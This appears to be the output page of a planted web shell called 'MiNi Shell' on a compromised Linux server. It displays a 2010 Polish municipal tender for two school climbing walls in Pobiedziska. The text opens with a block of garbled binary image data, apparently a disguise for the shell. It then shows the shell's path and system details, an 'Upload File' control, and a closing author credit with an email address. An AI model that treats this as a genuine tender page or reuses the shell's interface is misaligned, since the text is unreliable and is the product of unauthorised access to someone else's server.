JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100825/230551-N-2010.html

<p class="kh_header"><b>Pobiedziska: ZAPROJEKTOWANIE, WYKONANIE, DOSTAWĘ I MONTAŻ DWÓCH ŚCIAN WSPINACZKOWYCH WRAZ Z PRZESZKOLENIEM OSÓB DO OBSŁUGI ŚCIANY WSPINACZKOWEJ.</b><br>
<b>Numer ogłoszenia: 230551 - 2010; data zamieszczenia: 25.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pobiedziska , ul. Tadeusza Kościuszki 4, 62-010 Pobiedziska, woj. wielkopolskie, tel. 061 8977100, faks 061 8977124.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAPROJEKTOWANIE, WYKONANIE, DOSTAWĘ I MONTAŻ DWÓCH ŚCIAN WSPINACZKOWYCH WRAZ Z PRZESZKOLENIEM OSÓB DO OBSŁUGI ŚCIANY WSPINACZKOWEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Zaprojektowanie, wykonanie, dostawa i montaż ściany wspinaczkowej o powierzchni ok. 50 m2 oraz ściany wspinaczkowej do bulderingu o powierzchni ok. 15 m2 wraz z przeszkoleniem osób do obsługi ściany wspinaczkowej.

Przedsięwzięcie obejmuje:
a) zaprojektowanie, wykonanie, dostawę i montaż ściany wspinaczkowej o powierzchni ok. 50 m2 
b) zaprojektowanie wykonanie, dostawę i montaż ściany wspinaczkowej do bulderingu o powierzchni ok 15 m2 
c) przeszkolenie 3 osób do obsługi ścianki wspinaczkowej.

UWAGI
Przed sporządzeniem ofert należy zapoznać się ze specyfiką budowanego kompleksu sportowo-edukacyjnego. W tym celu Wykonawca winien umówić się z przedstawicielem Zamawiającego.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie dwóch sztucznych ścian wspinaczkowych o powierzchniach  ok. 50 m2 i ok. 15 m2 - ściana do bulderingu. Wszystkie materiały, o ile posiadają, winny spełniać normy bezpieczeństwa lub posiadać odpowiednie certyfikaty. Ściany będą montowane w kompleksie sportowo-edukacyjnym przy Zespole Szkół w Pobiedziskach. 
Obie ściany należy zaprojektować (zgodnie z obowiązującymi normami i zasadami bezpieczeństwa), wykonać, dostarczyć i zamontować. Wykonawca zobowiązany będzie również do dostarczenia dokumentacji technicznej i użytkowej. W zakres zamówienia wchodzi dostawa chwytów wspinaczkowych w liczbie nie mniejszej niż 5 szt/m2.  

Ściana o powierzchni ok. 50 m2 (o wymiarach ok. 7x7m) z możliwością wspinania się z asekuracją dolną i górną. Na ścianie należy zapewnić możliwość wspinania się równocześnie 4-5 osób. W razie konieczności należy zaprojektować (zgodnie z normami)  i wykonać konstrukcję stalową wspierającą ścianę na której ma zostać zamontowana ściana wspinaczkowa. 
Należy zaprojektować ukształtowanie ściany ze stopniem trudności dla początkujących i średnio zaawansowanych. Maksymalne przewieszenie (do 1 m) przed zaprojektowaniem należy skonsultować z projektantem kompleksu sportowo-edukacyjnego i kierownikiem budowy.
Pokrycie konstrukcji ściany wspinaczkowej powinno zostać wykonane z typowych dla ścian wspinaczkowych paneli wspinaczkowych wykonanych na bazie sklejki o grubości min. 18mm. Panele powinny posiadać gniazda 10mm przeznaczone do zamocowania chwytów wspinaczkowych w ilości zapewniającej dokonywanie zmian w przebiegu tras wspinaczkowych poprzez zamienianie pozycji chwytów - gniazda w ilości nie mniejszej niż 18 szt./m2. Panele musza spełniać warunki techniczne norm typowych dla ścian wspinaczkowych. 
Chwyty winny być wykonane z materiałów typowych dla sportów wspinaczkowych - muszą spełniać normy bezpieczeństwa. Wraz z chwytami należy dostarczyć elementy montażowe niezbędne do mocowania chwytów. 
W zakres zamówienia wchodzi również dostawa:
-  sprzętu wspinaczkowego na który składać się będą elementy niezbędne do bezpiecznego wspinania się od 4 do 5 osób jednocześnie  tj: liny statyczne o długości min. 100 m , przyrząd asekuracyjne (w liczbie wystarczającej do wspinania się dwóch osób jednocześnie), karabinki zakręcane typu HMS, uprzęże wspinaczkowe biodrowe,
- systemów asekuracyjnych montowanych do konstrukcji stalowych zgodnie z nomami bezpieczeństwa.
 W zakres zamówienia wchodzi przeprowadzenia szkolenia dla 3 osób obsługujących ścianę wspinaczkową wskazanych przez Zamawiającego oraz wykonanie dwóch przeglądów technicznych (tzw. przegląd rozruchowy i po pół roku użytkowania).

Ściana o powierzchni ok. 15 m2 do bulderingu (o wymiarach ok. 4,5 x 2,9 m). Wraz ze ścianą należy dostarczyć materac o grubości min. 20 cm. Szerokość materaca winna być równa szerokości ściany wspinaczkowej i zapewniać bezpieczny upadek ze ściany wspinaczkowej na całej powierzchni przeznaczonej do wspinania. W razie konieczności należy zaprojektować (zgodnie z normami)  i wykonać konstrukcję stalową wspierającą ścianę na której ma zostać zamontowana ściana wspinaczkowa.
Ściana powinna być zbudowana z płaszczyzn trójkątnych typowych dla bulderingu, o różnym stopniu nachylenia. Należy zaprojektować ukształtowanie ściany ze stopniem trudności dla początkujących i średnio zaawansowanych.
Pokrycie konstrukcji ściany wspinaczkowej powinno zostać wykonane z typowych dla ścian wspinaczkowych paneli wspinaczkowych wykonanych na bazie sklejki o grubości min. 18mm. Panele powinny posiadać gniazda 10mm przeznaczone do zamocowania chwytów wspinaczkowych w ilości zapewniającej dokonywanie zmian w przebiegu tras wspinaczkowych poprzez zamienianie pozycji chwytów - gniazda w ilości nie mniejszej niż 18 szt./m2. Panele muszą spełniać warunki techniczne norm typowych dla ścian wspinaczkowych. 
Chwyty winny być wykonane z materiałów typowych dla sportów wspinaczkowych - muszą spełniać normy bezpieczeństwa. Wraz z chwytami należy dostarczyć elementy montażowe niezbędne do mocowania chwytów.
W zakres zamówienia wchodzą dwa przeglądy techniczne (tzw. przegląd rozruchowy i po pół roku użytkowania)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.20-5, 37.53.52.90-6, 37.53.52.91-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 25.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: posiadania wiedzy i doświadczenia, Wykonawca musi wykazać się realizacją zamówień związanych z projektowaniem, wykonaniem, dostawą i montażem ścian wspinaczkowych w ilości co najmniej 1 realizacji (o minimalnej wartości zamówienia 80 000,00 zł) w okresie ostatnich 3 lat przed upływem terminu składania ofert;
Oceny spełnienia warunków udziału w postępowaniu przez Wykonawcę, Zamawiający dokona biorąc pod uwagę złożone dokumenty i oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej:
a) posiadanie polisy ubezpieczeniowej na kwotę min. 50 000,00 zł,
Oceny spełnienia warunków udziału w postępowaniu przez Wykonawcę, Zamawiający dokona biorąc pod uwagę złożone dokumenty i oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Zamawiający żąda: upoważnienia do podpisania oferty podpisane przez osobę lub osoby figurujące w rejestrze handlowym (lub innym dokumencie, o którym mowa w rubryce 1) jako posiadającą uprawnienia do podpisywania zobowiązań w imieniu Oferenta w przypadku podpisania oferty przez osobę nieupoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy jest załącznikiem do SIWZ.
2. Zawarta umowa będzie umową ryczałtową. 
3. Zamawiający zastrzega możliwość zmian postanowień zawartej umowy w przypadkach:
3.1)	Zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych
3.2)	 Aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny
3.3)	Zmiany wymiarów, położenia lub wysokości części robót budowlanych 
3.4)	Konieczność przesunięcia terminu wykonania Zamówienia ze względu na:
a) działanie siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), konieczność wykonania prac archeologicznych mających bezpośredni wpływ na terminowość wykonywania robót,
b) wystąpienie warunków atmosferycznych uniemożliwiających wykonywanie robót,
c) wystąpienie błędów w dokumentacji projektowej, których usunięcie będzie skutkować koniecznością konsultacji z projektantem i naniesienia przez niego poprawek lub zmiany projektu,
d) długotrwałą przerwę (powyżej 3 dni) w dostawach prądu, wody, gazu,
e) konieczność uzyskania decyzji oraz uzgodnień mogących spowodować wstrzymanie robót,
f) trudności wynikające z opóźnień w przekazaniu gotowych pomieszczeń przez wykonawcę generalnego kompleksu sportowo-edukacyjnego przy Zespole Szkół w Pobiedziskach, w tym przypadku Wykonawca jest zobowiązany do wstrzymania się z dostawą, ustawieniem i montażem przedmiotu zamówienia do czasu zaistnienia możliwości wejścia na teren budowy,
g) wystąpienie innych okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. 
3.5) Zmniejszenia zakresu Zamówienia spowodowanego tym, iż wykonanie całości zamówienia nie leży w interesie publicznym.
4. Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ
5. Zmiany umowy mogą być inicjowane przez zamawiającego lub przez wykonawcę.
6. Jeżeli zmiany, o których mowa w ust. 3 wymaga zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę wraz z informacją - o konieczności lub nie - zmiany pozwolenia na budowę oraz przedmiar  i niezbędne rysunki. Projekt taki wymaga akceptacji projektanta, nadzoru autorskiego i zatwierdzenia do realizacji przez Zamawiającego. 
7. Warunkiem dokonania zmian, o których mowa w ust. 3 jest złożenie pisemnego wniosku, przez stronę inicjującą zmianę, zawierającego:
- opis propozycji zmiany,
- uzasadnienie zmiany,
- opis wpływu zmiany na termin wykonania umowy.
8. W przedstawionych w pkt 3 przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju przesunięcie terminu nastąpi w formie aneksu do niniejszej umowy. 
9. Umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pobiedziska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Pobiedziska, ul. Kościuszki 4, 62-010 Pobiedziska, pok. 324..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2010 godzina 10:00, miejsce: Sekretariat Urzędu Miasta i Gminy Pobiedziska, ul. Kościuszki 4, 62-010 Pobiedziska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Budowa kompleksu sportowo-edukacyjnego przy Zespole Szkół w Pobiedziskach uzyskał dofinansowanie w ramach WIELKOPOLSKIEGO REGIONALNEGO PROGRAMU OPERACYJNEGO NA LATA 2007-2013, Priorytet V, Działanie 5.2, Schemat I..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com